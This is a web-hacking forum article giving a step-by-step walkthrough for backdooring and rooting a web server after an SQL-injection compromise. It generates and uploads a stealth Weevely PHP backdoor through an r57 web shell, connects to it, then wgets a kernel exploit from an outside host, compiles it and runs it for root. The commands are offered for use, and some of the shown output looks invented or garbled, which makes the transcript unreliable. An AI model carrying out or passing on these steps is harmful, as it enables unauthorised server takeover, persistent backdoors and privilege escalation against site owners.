| Main » Articles » Web Hacking » Server Rooting |
BackDoor & Rooting With Backtrack
 Now for this you need A Virtual Machine Install with Backtrack 5. Lets Start.. Assume our target site : http://target.com/ Now we have hacked admin panel of site via SQL injection. The site was sql vulnerable (Assumption) Admin Panel: http://target.com/admin/index.php After logging into the admin panel we have uploaded our shell (r57.php) shell location on server: http://target.com/uploads/r57.php now.. Run you Vmware >> Backtrack 5... The game starts now.. Backdooring a server with encrypted php backdoor.. amazing ! root@bt:~# root@bt:~# cd /pentest/backdoors/web/weevely Weevely 0.3 – Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ Where -p = your password to access the backdoor -g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it) -o = specify your output file root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p rustles + Backdoor file ‘bdoor.php ’ created with password ‘rustles".Now go and check your desktop. There will be a encrypted php file bdoor.php . =>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php =>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location Now we have to connect to our encrypted bdoor.php root@bt:/pentest/backdoors/web/weevely# ./main.py -t - u http://target.com/uploads/bdoor.php -p rustles Weevely 0.3 – Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ + Using method ‘system()’. + Retrieving terminal basic environment variables . [hacker@target.com/] ls Index.php admin uploads images config.php contact.php Director listing Successful. [hacker@target.com/] mkdir tmp Directory tmp successfully created!! [hacker@target.com/] cd tmp [hacker@target.com/tmp] mkdir pcp Directory pcp Successfully Created. [hacker@target.com/tmp] cd pcp [hacker@target.com/tmp/pcp] uname -r / -a Linux 2.6.32 kernel (Assume) [hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c Downloading 2.6.32.c File Transfer Complete -----------------100% ---------- 2.6.32.c [hacker@target.com/tmp/pcp] ls 2.6.32.c Directory Successfully listed. [hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall - - done [hacker@target.com/tmp/pcp] ./hackall - - [hacker@target.com/tmp/pcp] id uid=(root) gid=(root) [hacker@target.com/tmp/pcp] Rooted Enjoy!
Special ThanX to GeniusHaCkers | |
| Views: 2552 | Comments: 1 | Rating: 5.0/1 |
| Total comments: 1 | |
|
| |
